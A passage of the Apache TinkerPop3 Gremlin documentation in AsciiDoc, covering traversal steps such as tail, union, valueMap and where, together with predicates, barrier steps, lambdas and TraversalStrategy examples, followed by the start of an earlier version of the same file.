vertex:\n\n[gremlin-groovy,modern]\n----\nsubGraph = g.V(3).repeat(__.inE().subgraph('subGraph').outV()).times(3).cap('subGraph').next() <1>\nsg = subGraph.traversal(standard())\nsg.E()\n----\n\n<1> Starting at vertex `3`, traverse 3 steps away on in-edges, outputting all of that into the subgraph.\n\nThere can be multiple `subgraph()` calls within the same traversal, each operating against either the same graph (i.e. same side-effect key) or different graphs (i.e. different side-effect keys).\n\n[gremlin-groovy,modern]\n----\nt = g.V().outE('knows').subgraph('knowsG').inV().outE('created').subgraph('createdG').\n inV().inE('created').subgraph('createdG').iterate()\nt.sideEffects.get('knowsG').get().traversal(standard()).E()\nt.sideEffects.get('createdG').get().traversal(standard()).E()\n----\n\nIMPORTANT: The `subgraph()`-step only writes to graphs that support user-supplied ids for its elements. 
Moreover, if no graph is specified via `withSideEffect()`, then <<tinkergraph-gremlin,TinkerGraph>> is assumed.\n\n[[sum-step]]\nSum Step\n~~~~~~~~\n\nThe `sum()`-step (*map*) operates on a stream of numbers and sums the numbers together to yield a double. Note that the current traverser number is multiplied by the traverser bulk to determine how many such numbers are being represented.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').sum()\ng.V().repeat(both()).times(3).values('age').sum()\n----\n\nIMPORTANT: `sum(local)` determines the sum of the current, local object (not the objects in the traversal stream). This works for `Collection`-type objects. For any other object, a sum of `Double.NaN` is returned.\n\n[[tail-step]]\nTail Step\n~~~~~~~~~\n\nimage::tail-step.png[width=530]\n\nThe `tail()`-step is analogous to <<limit-step,`limit()`>>-step, except that it emits the last `n`-objects instead of the first `n`-objects.\n\n[gremlin-groovy,modern]\n----\ng.V().values('name').order()\ng.V().values('name').order().tail() <1>\ng.V().values('name').order().tail(1) <2>\ng.V().values('name').order().tail(3) <3>\n----\n\n<1> Last name (alphabetically).\n<2> Same as statement 1.\n<3> Last three names.\n\nThe `tail()`-step can also be applied with `Scope.local`, in which case it operates on the incoming collection.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('a').out().as('a').select('a').by(tail(local)).values('name') <1>\ng.V().as('a').out().as('a').out().as('a').select('a').by(unfold().values('name').fold()).tail(local) <2>\ng.V().as('a').out().as('a').out().as('a').select('a').by(unfold().values('name').fold()).tail(local, 2) <3>\ng.V().valueMap().tail(local) <4>\n----\n\n<1> Only the most recent name from the \"a\" step (`List<Vertex>` becomes `Vertex`).\n<2> Same result as statement 1 (`List<String>` becomes `String`).\n<3> `List<String>` for each path containing the last two names from the 'a' step.\n<4> `Map<String, Object>` for each vertex, but containing only the last property value.\n\n[[timelimit-step]]\nTimeLimit Step\n~~~~~~~~~~~~~~\n\nIn many situations, a graph traversal is not so much about getting an exact answer as it is about getting a relative ranking. A classic example is link:http:\/\/en.wikipedia.org\/wiki\/Recommender_system[recommendation]. What is desired is a relative ranking of vertices, not their absolute rank. Next, it may be desirable to have the traversal execute for no more than 2 milliseconds. In such situations, `timeLimit()`-step (*filter*) can be used.\n\nimage::timelimit-step.png[width=400]\n\nNOTE: The method `clock(int runs, Closure code)` is a utility preloaded in the <<gremlin-console,Gremlin Console>> that can be used to time execution of a body of code.\n\n[gremlin-groovy,modern]\n----\ng.V().repeat(both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()\nclock(1) {g.V().repeat(both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()}\ng.V().repeat(timeLimit(2).both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()\nclock(1) {g.V().repeat(timeLimit(2).both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()}\n----\n\nIn essence, the relative order is respected, even though the number of traversers at each vertex is not. The primary benefit is that the calculation is guaranteed to complete at the specified time limit (in milliseconds). Finally, note that the internal clock of `timeLimit()`-step starts when the first traverser enters it. 
When the time limit is reached, any `next()` evaluation of the step will yield a `NoSuchElementException` and any `hasNext()` evaluation will yield `false`.\n\n[[tree-step]]\nTree Step\n~~~~~~~~~\n\nFrom any one element (i.e. vertex or edge), the emanating paths from that element can be aggregated to form a link:http:\/\/en.wikipedia.org\/wiki\/Tree_(data_structure)[tree]. Gremlin provides `tree()`-step (*sideEffect*) for such situations.\n\nimage::tree-step.png[width=450]\n\n[gremlin-groovy,modern]\n----\ntree = g.V().out().out().tree().next()\n----\n\nIt is important to see how the paths of all the emanating traversers are united to form the tree.\n\nimage::tree-step2.png[width=500]\n\nThe resultant tree data structure can then be manipulated (see `Tree` JavaDoc).\n\n[gremlin-groovy,modern]\n----\ntree = g.V().out().out().tree().by('name').next()\ntree['marko']\ntree['marko']['josh']\ntree.getObjectsAtDepth(3)\n----\n\n[[unfold-step]]\nUnfold Step\n~~~~~~~~~~~\n\nIf the object reaching `unfold()` (*flatMap*) is an iterator, iterable, or map, then it is unrolled into a linear form. If not, then the object is simply emitted. Please see <<fold-step,`fold()`>>-step for the inverse behavior.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out().fold().inject('gremlin',[1.23,2.34])\ng.V(1).out().fold().inject('gremlin',[1.23,2.34]).unfold()\n----\n\nNote that `unfold()` does not recursively unroll iterators. Instead, `repeat()` can be used for recursive unrolling.\n\n[gremlin-groovy,modern]\n----\ninject(1,[2,3,[4,5,[6]]])\ninject(1,[2,3,[4,5,[6]]]).unfold()\ninject(1,[2,3,[4,5,[6]]]).repeat(unfold()).until(count(local).is(1)).unfold()\n----\n\n[[union-step]]\nUnion Step\n~~~~~~~~~~\n\nimage::union-step.png[width=650]\n\nThe `union()`-step (*branch*) supports the merging of the results of an arbitrary number of traversals. When a traverser reaches a `union()`-step, it is copied to each of its internal steps. The traversers emitted from `union()` are the outputs of the respective internal traversals.\n\n[gremlin-groovy,modern]\n----\ng.V(4).union(\n __.in().values('age'),\n out().values('lang'))\ng.V(4).union(\n __.in().values('age'),\n out().values('lang')).path()\n----\n\n[[valuemap-step]]\nValueMap Step\n~~~~~~~~~~~~~\n\nThe `valueMap()`-step yields a Map representation of the properties of an element.\n\n[gremlin-groovy,modern]\n----\ng.V().valueMap()\ng.V().valueMap('age')\ng.V().valueMap('age','blah')\ng.E().valueMap()\n----\n\nIt is important to note that the map of a vertex maintains a list of values for each key. The map of an edge or vertex-property represents a single property (not a list). The reason is that vertices in TinkerPop3 leverage <<vertex-properties,vertex properties>> which support multiple values per key. Using the <<the-crew-toy-graph,\"The Crew\">> toy graph, the point is made explicit.\n\n[gremlin-groovy,theCrew]\n----\ng.V().valueMap()\ng.V().has('name','marko').properties('location')\ng.V().has('name','marko').properties('location').valueMap()\n----\n\nIf the `id`, `label`, `key`, and `value` of the `Element` is desired, then a boolean triggers its insertion into the returned map.\n\n[gremlin-groovy,theCrew]\n----\ng.V().hasLabel('person').valueMap(true)\ng.V().hasLabel('person').valueMap(true,'name')\ng.V().hasLabel('person').properties('location').valueMap(true)\n----\n\n[[vertex-steps]]\nVertex Steps\n~~~~~~~~~~~~\n\nimage::vertex-steps.png[width=350]\n\nThe vertex steps (*flatMap*) are fundamental to the Gremlin language. 
Via these steps, it is possible to \"move\" on the graph -- i.e. traverse.\n\n* `out(string...)`: Move to the outgoing adjacent vertices given the edge labels.\n* `in(string...)`: Move to the incoming adjacent vertices given the edge labels.\n* `both(string...)`: Move to both the incoming and outgoing adjacent vertices given the edge labels.\n* `outE(string...)`: Move to the outgoing incident edges given the edge labels.\n* `inE(string...)`: Move to the incoming incident edges given the edge labels.\n* `bothE(string...)`: Move to both the incoming and outgoing incident edges given the edge labels.\n* `outV()`: Move to the outgoing vertex.\n* `inV()`: Move to the incoming vertex.\n* `bothV()`: Move to both vertices.\n* `otherV()`: Move to the vertex that was not the vertex that was moved from.\n\n[gremlin-groovy,modern]\n----\ng.V(4)\ng.V(4).outE() <1>\ng.V(4).inE('knows') <2>\ng.V(4).inE('created') <3>\ng.V(4).bothE('knows','created','blah')\ng.V(4).bothE('knows','created','blah').otherV()\ng.V(4).both('knows','created','blah')\ng.V(4).outE().inV() <4>\ng.V(4).out() <5>\ng.V(4).inE().outV()\ng.V(4).inE().bothV()\n----\n\n<1> All outgoing edges.\n<2> All incoming knows-edges.\n<3> All incoming created-edges.\n<4> Moving forward touching edges and vertices.\n<5> Moving forward only touching vertices.\n\n[[where-step]]\nWhere Step\n~~~~~~~~~~\n\nThe `where()`-step filters the current object based on either the object itself (`Scope.local`) or the path history of the object (`Scope.global`) (*filter*). This step is typically used in conjunction with either <<match-step,`match()`>>-step or <<select-step,`select()`>>-step, but can be used in isolation.\n\n[gremlin-groovy,modern]\n----\ng.V(1).as('a').out('created').in('created').where(neq('a')) <1>\ng.withSideEffect('a',['josh','peter']).V(1).out('created').in('created').values('name').where(within('a')) <2>\ng.V(1).out('created').in('created').where(out('created').count().is(gt(1))).values('name') <3>\n----\n\n<1> Who are marko's collaborators, where marko can not be his own collaborator? (predicate)\n<2> Of the co-creators of marko, only keep those whose name is josh or peter. (using a sideEffect)\n<3> Which of marko's collaborators have worked on more than 1 project? (using a traversal)\n\nIMPORTANT: Please see <<using-where-with-match,`match().where()`>> and <<using-where-with-select,`select().where()`>> for how `where()` can be used in conjunction with `Map<String,Object>` projecting steps -- i.e. `Scope.local`.\n\nA few more examples of filtering an arbitrary object based on an anonymous traversal are provided below.\n\n[gremlin-groovy,modern]\n----\ng.V().where(out('created')).values('name') <1>\ng.V().out('knows').where(out('created')).values('name') <2>\ng.V().where(out('created').count().is(gte(2))).values('name') <3>\ng.V().where(out('knows').where(out('created'))).values('name') <4>\ng.V().where(__.not(out('created'))).where(__.in('knows')).values('name') <5>\ng.V().where(__.not(out('created')).and().in('knows')).values('name') <6>\n----\n\n<1> What are the names of the people who have created a project?\n<2> What are the names of the people that are known by someone and have created a project?\n<3> What are the names of the people who have created two or more projects?\n<4> What are the names of the people who know someone that has created a project? 
(This only works in OLTP -- see the `WARNING` below)\n<5> What are the names of the people who have not created anything, but are known by someone?\n<6> The concatenation of `where()`-steps is the same as a single `where()`-step with an and'd clause.\n\nWARNING: The anonymous traversal of `where()` processes the current object \"locally\". In OLAP, where the atomic unit of computing is the vertex and its local \"star graph,\" it is important that the anonymous traversal does not leave the confines of the vertex's star graph. In other words, it can not traverse to an adjacent vertex's properties or edges.\n\n[[a-note-on-predicates]]\nA Note on Predicates\n--------------------\n\nA `P` is a predicate of the form `Function<Object,Boolean>`. That is, given some object, return true or false. The provided predicates are outlined in the table below and are used in various steps such as <<has-step,`has()`>>-step, <<where-step,`where()`>>-step, <<is-step,`is()`>>-step, etc.\n\n[width=\"100%\",cols=\"3,15\",options=\"header\"]\n|=========================================================\n| Predicate | Description\n| `eq(object)` | Is the incoming object equal to the provided object?\n| `neq(object)` | Is the incoming object not equal to the provided object?\n| `lt(number)` | Is the incoming number less than the provided number?\n| `lte(number)` | Is the incoming number less than or equal to the provided number?\n| `gt(number)` | Is the incoming number greater than the provided number?\n| `gte(number)` | Is the incoming number greater than or equal to the provided number?\n| `inside(number,number)` | Is the incoming number greater than the first provided number and less than the second?\n| `outside(number,number)` | Is the incoming number less than the first provided number and greater than the second?\n| `between(number,number)` | Is the incoming number greater than or equal to the first provided number and less than the second?\n| `within(objects...)` | Is the incoming object in the array of provided objects?\n| `without(objects...)` | Is the incoming object not in the array of the provided objects?\n|=========================================================\n\n[gremlin-groovy]\n----\neq(2)\nnot(neq(2)) <1>\nnot(within('a','b','c'))\nnot(within('a','b','c')).test('d') <2>\nnot(within('a','b','c')).test('a')\nwithin(1,2,3).and(not(eq(2))).test(3) <3>\ninside(1,4).or(eq(5)).test(3) <4>\ninside(1,4).or(eq(5)).test(5)\nbetween(1,2) <5>\nnot(between(1,2))\n----\n\n<1> The `not()` of a `P`-predicate is another `P`-predicate.\n<2> `P`-predicates are arguments to various steps which internally `test()` the incoming value.\n<3> `P`-predicates can be and'd together.\n<4> `P`-predicates can be or'd together.\n<5> `and()` is a `P`-predicate and thus, a `P`-predicate can be composed of multiple `P`-predicates.\n\nFinally, note that <<where-step,`where()`>>-step takes a `P<String>`. The provided string value refers to a variable binding, not to the explicit string value.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').both().both().as('b').count()\ng.V().as('a').both().both().as('b').where('a',neq('b')).count()\n----\n\nNOTE: It is possible for vendors and users to extend `P` and provide new predicates. For instance, a `regex(pattern)` could be a vendor-specific `P`.\n\n[[a-note-on-barrier-steps]]\nA Note on Barrier Steps\n-----------------------\n\nimage:barrier.png[width=165,float=right] Gremlin is primarily a link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazy], stream processing language. 
[[a-note-on-barrier-steps]]
A Note on Barrier Steps
-----------------------

image:barrier.png[width=165,float=right] Gremlin is primarily a link:http://en.wikipedia.org/wiki/Lazy_evaluation[lazy], stream processing language. This means that Gremlin fully processes (to the best of its abilities) any traversers currently in the traversal pipeline before getting more data from the start/head of the traversal. However, there are numerous situations in which a completely lazy computation is not possible (or impractical). When a computation is not lazy, a "barrier step" exists. There are three types of barriers:

 . `CollectingBarrierStep`: All of the traversers prior to the step are put into a collection and then processed in some way (e.g. ordered) prior to the collection being "drained" one-by-one to the next step. Examples include: <<order-step,`order()`>>, <<sample-step,`sample()`>>, <<aggregate-step,`aggregate()`>>, <<barrier-step,`barrier()`>>.
 . `ReducingBarrierStep`: All of the traversers prior to the step are processed by a reduce function and once all the previous traversers are processed, a single "reduced value" traverser is emitted to the next step. Examples include: <<fold-step,`fold()`>>, <<count-step,`count()`>>, <<sum-step,`sum()`>>, <<max-step,`max()`>>, <<min-step,`min()`>>.
 . `SupplyingBarrierStep`: All of the traversers prior to the step are iterated (no processing) and then some provided supplier yields a single traverser to continue to the next step. Examples include: <<cap-step,`cap()`>>.
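The following sketch (using the modern toy graph) tags a representative step for each of the three barrier types described above:

[source,groovy]
----
g.V().values('age').order()   // order() is a CollectingBarrierStep
g.V().values('age').sum()     // sum() is a ReducingBarrierStep
g.V().aggregate('x').cap('x') // cap() is a SupplyingBarrierStep
----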
In Gremlin OLAP (see <<traversalvertexprogram,`TraversalVertexProgram`>>), a barrier is introduced at the end of every <<vertex-steps,adjacent vertex step>>. This means that the traversal does its best to compute as much as possible at the current, local vertex. What it can't compute without referencing an adjacent vertex is aggregated into a barrier collection. When there are no more traversers at the local vertex, the barriered traversers are the messages that are propagated to remote vertices for further processing.

[[a-note-on-lambdas]]
A Note On Lambdas
-----------------

image:lambda.png[width=150,float=right] A link:http://en.wikipedia.org/wiki/Anonymous_function[lambda] is a function that can be referenced by software and thus, passed around like any other piece of data. In Gremlin, lambdas make it possible to generalize the behavior of a step such that custom steps can be created (on-the-fly) by the user. However, it is advised to avoid using lambdas if possible.

[gremlin-groovy,modern]
----
g.V().filter{it.get().value('name') == 'marko'}.
      flatMap{it.get().vertices(OUT,'created')}.
      map {it.get().value('name')} <1>
g.V().has('name','marko').out('created').values('name') <2>
----

<1> A lambda-rich Gremlin traversal which should and can be avoided. (*bad*)
<2> The same traversal (result), but without using lambdas. (*good*)

Gremlin attempts to provide the user a comprehensive collection of steps in the hopes that the user will never need to leverage a lambda in practice. It is advised that users leverage a lambda if and only if there is no corresponding lambda-less step that encompasses the desired functionality. The reason is that lambdas can not be optimized by Gremlin's compiler strategies as they can not be programmatically inspected (see <<traversalstrategy,traversal strategies>>).

In many situations where a lambda could be used, either a corresponding step exists or a traversal can be provided in its place. A `TraversalLambda` behaves like a typical lambda, but it can be optimized and it yields fewer objects than the corresponding pure-lambda form.

[gremlin-groovy,modern]
----
g.V().out().out().path().by {it.value('name')}.
                         by {it.value('name')}.
                         by {g.V(it).in('created').values('name').fold().next()} <1>
g.V().out().out().path().by('name').
                         by('name').
                         by(__.in('created').values('name').fold()) <2>
----

<1> The length-3 paths have each of their objects transformed by a lambda. (*bad*)
<2> The length-3 paths have their objects transformed by a lambda-less step and a traversal lambda. (*good*)

[[traversalstrategy]]
TraversalStrategy
-----------------

image:traversal-strategy.png[width=125,float=right] A `TraversalStrategy` can analyze a `Traversal` and mutate the traversal as it deems fit. This is useful in multiple situations:

 * There is an application-level feature that can be embedded into the traversal logic (*decoration*).
 * There is a more efficient way to express the traversal at the TinkerPop3 level (*optimization*).
 * There is a more efficient way to express the traversal at the graph vendor level (*vendor optimization*).
 * There are some final adjustments required before executing the traversal (*finalization*).
 * There are certain traversals that are not legal for the application or traversal engine (*verification*).

A simple `OptimizationStrategy` is the `IdentityRemovalStrategy`.

[source,java]
----
public final class IdentityRemovalStrategy extends AbstractTraversalStrategy<TraversalStrategy.OptimizationStrategy> implements TraversalStrategy.OptimizationStrategy {

    private static final IdentityRemovalStrategy INSTANCE = new IdentityRemovalStrategy();

    private IdentityRemovalStrategy() {
    }

    @Override
    public void apply(final Traversal.Admin<?, ?> traversal) {
        if (!TraversalHelper.hasStepOfClass(IdentityStep.class, traversal))
            return;

        TraversalHelper.getStepsOfClass(IdentityStep.class, traversal).stream().forEach(identityStep -> {
            final Step<?, ?> previousStep = identityStep.getPreviousStep();
            if (!(previousStep instanceof EmptyStep) || identityStep.getLabels().isEmpty()) {
                ((IdentityStep<?>) identityStep).getLabels().forEach(previousStep::addLabel);
                traversal.removeStep(identityStep);
            }
        });
    }

    public static IdentityRemovalStrategy instance() {
        return INSTANCE;
    }
}
----

This strategy simply removes any `IdentityStep` steps in the Traversal as `aStep().identity().identity().bStep()` is equivalent to `aStep().bStep()`. For those traversal strategies that require other strategies to execute prior or post to the strategy, the following two methods can be defined in `TraversalStrategy` (with defaults being an empty set). If the `TraversalStrategy` is in a particular traversal category (i.e. decoration, optimization, vendor-optimization, finalization, or verification), then priors and posts are only possible within the category.

[source,java]
public Set<Class<? extends S>> applyPrior();
public Set<Class<? extends S>> applyPost();
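For example, a strategy that should only execute after `IdentityRemovalStrategy` within the optimization category might declare that dependency as in the following sketch (the `MyOptimizationStrategy` class is hypothetical):

[source,java]
----
// Hypothetical strategy that requires IdentityRemovalStrategy to execute before it.
public final class MyOptimizationStrategy extends AbstractTraversalStrategy<TraversalStrategy.OptimizationStrategy> implements TraversalStrategy.OptimizationStrategy {

    @Override
    public void apply(final Traversal.Admin<?, ?> traversal) {
        // mutate the traversal, knowing that all identity()-steps have already been removed
    }

    @Override
    public Set<Class<? extends TraversalStrategy.OptimizationStrategy>> applyPrior() {
        return Collections.<Class<? extends TraversalStrategy.OptimizationStrategy>>singleton(IdentityRemovalStrategy.class);
    }
}
----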
IMPORTANT: `TraversalStrategy` strategies are sorted within their category and the categories are then executed in the following order: decoration, optimization, vendor-optimization, finalization, and verification. If a designed strategy does not fit cleanly into these categories, then it can implement `TraversalStrategy` and its priors and posts can reference strategies within any category.

An example of a `VendorOptimizationStrategy` is provided below.

[source,groovy]
g.V().has('name','marko')

The expression above can be executed in a `O(|V|)` or `O(log(|V|))` fashion in <<tinkergraph-gremlin,TinkerGraph>> depending on whether there is or is not an index defined for "name."

[source,java]
----
public final class TinkerGraphStepStrategy extends AbstractTraversalStrategy<TraversalStrategy.VendorOptimizationStrategy> implements TraversalStrategy.VendorOptimizationStrategy {

    private static final TinkerGraphStepStrategy INSTANCE = new TinkerGraphStepStrategy();

    private TinkerGraphStepStrategy() {
    }

    @Override
    public void apply(final Traversal.Admin<?, ?> traversal) {
        if (traversal.getEngine().isComputer())
            return;

        final Step<?, ?> startStep = traversal.getStartStep();
        if (startStep instanceof GraphStep) {
            final GraphStep<?> originalGraphStep = (GraphStep) startStep;
            final TinkerGraphStep<?> tinkerGraphStep = new TinkerGraphStep<>(originalGraphStep);
            TraversalHelper.replaceStep(startStep, (Step) tinkerGraphStep, traversal);

            Step<?, ?> currentStep = tinkerGraphStep.getNextStep();
            while (currentStep instanceof HasContainerHolder) {
                ((HasContainerHolder) currentStep).getHasContainers().forEach(tinkerGraphStep::addHasContainer);
                currentStep.getLabels().forEach(tinkerGraphStep::addLabel);
                traversal.removeStep(currentStep);
                currentStep = currentStep.getNextStep();
            }
        }
    }

    public static TinkerGraphStepStrategy instance() {
        return INSTANCE;
    }
}
----

The traversal is redefined by simply taking a chain of `has()`-steps after `g.V()` (`GraphStep`) and providing them to `TinkerGraphStep`. Then it's up to `TinkerGraphStep` to determine if an appropriate index exists. In the `TinkerGraphStep` code, review the `vertices()` method and note how, if an index exists for a particular `HasContainer`, that index is first queried before the remaining `HasContainer` filters are serially applied. Given that the strategy uses non-TinkerPop3 provided steps, it should go into the `VendorOptimizationStrategy` category to ensure the added step does not corrupt the `OptimizationStrategy` strategies.

[gremlin-groovy,modern]
----
t = g.V().has('name','marko'); null
t.toString()
t.iterate(); null
t.toString()
----

CAUTION: The reason that `OptimizationStrategy` and `VendorOptimizationStrategy` are two different categories is that optimization strategies should only rewrite the traversal using TinkerPop3 steps. This ensures that the optimizations executed at the end of the optimization strategy round are TinkerPop3 compliant. From there, vendor optimizations can analyze the traversal and rewrite the traversal as desired using vendor specific steps (e.g. replacing `GraphStep.HasStep...HasStep` with `TinkerGraphStep`). If a vendor's optimizations use vendor-specific steps and implement `OptimizationStrategy`, then other TinkerPop3 optimizations may fail to optimize the traversal or misunderstand the vendor-specific step behaviors (e.g. `VendorVertexStep extends VertexStep`) and yield incorrect semantics.

A collection of useful `DecorationStrategy` strategies are provided with TinkerPop3 and are generally useful to end-users.
The following sub-sections detail these strategies:

ElementIdStrategy
~~~~~~~~~~~~~~~~~

`ElementIdStrategy` provides control over element identifiers. Some Graph implementations, such as TinkerGraph, allow specification of custom identifiers when creating elements:

[gremlin-groovy]
----
g = TinkerGraph.open().traversal()
v = g.addV().property(id,'42a').next()
g.V('42a')
----

Other `Graph` implementations, such as Neo4j, generate element identifiers automatically; custom identifiers cannot be assigned. As a helper, `ElementIdStrategy` can be used to make identifier assignment possible by using vertex and edge indices under the hood.

[gremlin-groovy]
----
graph = Neo4jGraph.open('/tmp/neo4j')
strategy = ElementIdStrategy.build().create()
g = GraphTraversalSource.build().with(strategy).create(graph)
g.addV().property(id, '42a').id()
----

IMPORTANT: The key that is used to store the assigned identifier should be indexed in the underlying graph database. If it is not indexed, then lookups for the elements that use these identifiers will perform a linear scan.

EventStrategy
~~~~~~~~~~~~~

The purpose of the `EventStrategy` is to raise events to one or more `MutationListener` objects as changes to the underlying `Graph` occur within a `Traversal`. Such a strategy is useful for logging changes, triggering certain actions based on change, or any application that needs notification of some mutating operation during a `Traversal`. If the transaction is rolled back, the event queue is reset.

The following events are raised to the `MutationListener`:

* New vertex
* New edge
* Vertex property changed
* Edge property changed
* Vertex property removed
* Edge property removed
* Vertex removed
* Edge removed

To start processing events from a `Traversal`, first implement the `MutationListener` interface. An example of this implementation is the `ConsoleMutationListener` which writes output to the console for each event. The following console session displays the basic usage:

[gremlin-groovy]
----
graph = TinkerFactory.createModern()
l = new ConsoleMutationListener(graph)
strategy = EventStrategy.build().addListener(l).create()
g = GraphTraversalSource.build().with(strategy).create(graph)
g.addV('name','stephen')
g.E().drop()
----

By default, the `EventStrategy` is configured with an `EventQueue` that raises events as they occur within execution of a `Step`. As such, the final line of Gremlin execution that drops all edges shows a bit of an inconsistent count, where the removed edge count is accounted for after the event is raised. The strategy can also be configured with a `TransactionalEventQueue` that captures the changes within a transaction and does not allow them to fire until the transaction is committed.

CAUTION: `EventStrategy` is not meant for usage in tracking global mutations across separate processes. In other words, a mutation in one JVM process is not raised as an event in a different JVM process. In addition, events are not raised when mutations occur outside of the `Traversal` context.

PartitionStrategy
~~~~~~~~~~~~~~~~~

image::partition-graph.png[width=325]

`PartitionStrategy` partitions the vertices and edges of a graph into `String` named partitions (i.e. buckets, subgraphs, etc.). The idea behind `PartitionStrategy` is presented in the image above where each element is in a single partition (represented by its color). Partitions can be read from, written to, and linked/joined by edges that span one or two partitions (e.g.
a tail vertex in one partition and a head vertex in another).

There are three primary configurations in `PartitionStrategy`:

. Partition Key - The property key that denotes a String value representing a partition.
. Write Partition - A `String` denoting what partition all future written elements will be in.
. Read Partitions - A `Set<String>` of partitions that can be read from.

The best way to understand `PartitionStrategy` is via example.

[gremlin-groovy]
----
graph = TinkerFactory.createModern()
strategyA = PartitionStrategy.build().partitionKey("_partition").writePartition("a").addReadPartition("a").create()
strategyB = PartitionStrategy.build().partitionKey("_partition").writePartition("b").addReadPartition("b").create()
gA = GraphTraversalSource.build().with(strategyA).create(graph)
gA.addV() // this vertex has a property of {_partition:"a"}
gB = GraphTraversalSource.build().with(strategyB).create(graph)
gB.addV() // this vertex has a property of {_partition:"b"}
gA.V()
gB.V()
----

Partitions may also extend to `VertexProperty` elements if the `Graph` can support meta-properties and if the `includeMetaProperties` value is set to `true` when the `PartitionStrategy` is built. The `partitionKey` will be stored in the meta-properties of the `VertexProperty`, hiding those properties from the traversal. Please note that the `VertexProperty` will only be hidden by way of the `Traversal` itself. For example, calling `Vertex.property(k)` bypasses the context of the `PartitionStrategy` and will thus allow all properties to be accessed.

By writing elements to particular partitions and then restricting read partitions, the developer is able to create multiple graphs within a single address space. Moreover, by supporting references between partitions, it is possible to merge those multiple graphs (i.e. join partitions).

ReadOnlyStrategy
~~~~~~~~~~~~~~~~

`ReadOnlyStrategy` is largely self-explanatory. A `Traversal` that has this strategy applied will throw an `IllegalStateException` if the `Traversal` has any mutating steps within it.
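A minimal sketch of its effect, assuming the modern toy graph and the same builder pattern used for the other strategies in this section:

[source,groovy]
----
graph = TinkerFactory.createModern()
g = GraphTraversalSource.build().with(ReadOnlyStrategy.instance()).create(graph)
g.V().values('name') // reads work as usual
g.addV()             // a mutating step would throw an IllegalStateException
----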
SubgraphStrategy
~~~~~~~~~~~~~~~~

`SubgraphStrategy` is quite similar to `PartitionStrategy` in that it restrains a `Traversal` to certain vertices and edges as determined by a `Traversal` criterion defined individually for each.

[gremlin-groovy]
----
graph = TinkerFactory.createModern()
strategy = SubgraphStrategy.build().edgeCriterion(hasId(8,9,10)).create()
g = GraphTraversalSource.build().with(strategy).create(graph)
g.V() // shows all vertices as no filter for vertices was specified
g.E() // shows only the edges defined in the edgeCriterion
----

This strategy is implemented such that the vertices attached to an `Edge` must both satisfy the `vertexCriterion` (if present) in order for the `Edge` to be considered a part of the subgraph.
","old_contents":"////
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at

 http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
////
[[traversal]]
The Traversal
=============

image::gremlin-running.png[width=125]

At the most general level there is `Traversal<S,E>` which implements `Iterator<E>`, where the `S` stands for start and the `E` stands for end. A traversal is composed of four primary components:

 . `Step<S,E>`: an individual function applied to `S` to yield `E`. Steps are chained within a traversal.
 . `TraversalStrategy`: interceptor methods to alter the execution of the traversal (e.g. query re-writing).
 . `TraversalSideEffects`: key/value pairs that can be used to store global information about the traversal.
 . `Traverser<T>`: the object propagating through the `Traversal` currently representing an object of type `T`.

The classic notion of a graph traversal is provided by `GraphTraversal<S,E>` which extends `Traversal<S,E>`. `GraphTraversal` provides an interpretation of the graph data in terms of vertices, edges, etc. and thus, a graph traversal link:http://en.wikipedia.org/wiki/Domain-specific_language[DSL].

IMPORTANT: The underlying `Step` implementations provided by TinkerPop should encompass most of the functionality required by a DSL author. It is important that DSL authors leverage the provided steps as then the common optimization and decoration strategies can reason on the underlying traversal sequence. If new steps are introduced, then common traversal strategies may not function properly.

[[graph-traversal-steps]]
Graph Traversal Steps
---------------------

image::step-types.png[width=650]

A `GraphTraversal<S,E>` is spawned from a `GraphTraversalSource`. It can also be spawned anonymously (i.e. empty) via `__`. A graph traversal is composed of an ordered list of steps. All the steps provided by `GraphTraversal` inherit from the more general forms diagrammed above. A list of all the steps (and their descriptions) is provided in the TinkerPop3 link:http://www.tinkerpop.com/javadocs/x.y.z/core/org/apache/tinkerpop/gremlin/process/graph/GraphTraversal.html[GraphTraversal JavaDoc]. The following subsections will demonstrate the GraphTraversal steps using the <<gremlin-console,Gremlin Console>>.

NOTE: To reduce the verbosity of the expression, it is good to `import static org.apache.tinkerpop.gremlin.process.traversal.dsl.graph.__.*`. This way, instead of doing `__.inE()` for an anonymous traversal, it is possible to simply write `inE()`. Be aware of language-specific reserved keywords when using anonymous traversals. For example, `in` and `as` are reserved keywords in Groovy, therefore you must use the verbose syntax `__.in()` and `__.as()` to avoid collisions.
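For instance, with the static import in place, the two styles look as follows (a sketch; `in` still requires the `__.` prefix because of Groovy's keyword rules):

[source,groovy]
----
import static org.apache.tinkerpop.gremlin.process.traversal.dsl.graph.__.*

g.V().where(out('created'))   // out() can be used instead of __.out()
g.V().where(__.in('created')) // 'in' is a reserved keyword in Groovy, so __.in() is required
----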
[[lambda-steps]]
Lambda Steps
~~~~~~~~~~~~

CAUTION: Lambda steps are presented for educational purposes as they represent the foundational constructs of the Gremlin language. In practice, lambda steps should be avoided and traversal verification strategies exist to disallow their use unless explicitly "turned off." For more information on the problems with lambdas, please read <<a-note-on-lambdas,A Note on Lambdas>>.

There are five generic steps by which all other specific steps described later extend.

[width="100%",cols="10,12",options="header"]
|=========================================================
| Step | Description
| `map(Function<Traverser<S>, E>)` | map the traverser to some object of type `E` for the next step to process.
| `flatMap(Function<Traverser<S>, Iterator<E>>)` | map the traverser to an iterator of `E` objects that are streamed to the next step.
| `filter(Predicate<Traverser<S>>)` | map the traverser to either true or false, where false will not pass the traverser to the next step.
| `sideEffect(Consumer<Traverser<S>>)` | perform some operation on the traverser and pass it to the next step.
| `branch(Function<Traverser<S>,M>)` | split the traverser to all the traversals indexed by the `M` token.
|=========================================================

The `Traverser<S>` object provides access to:

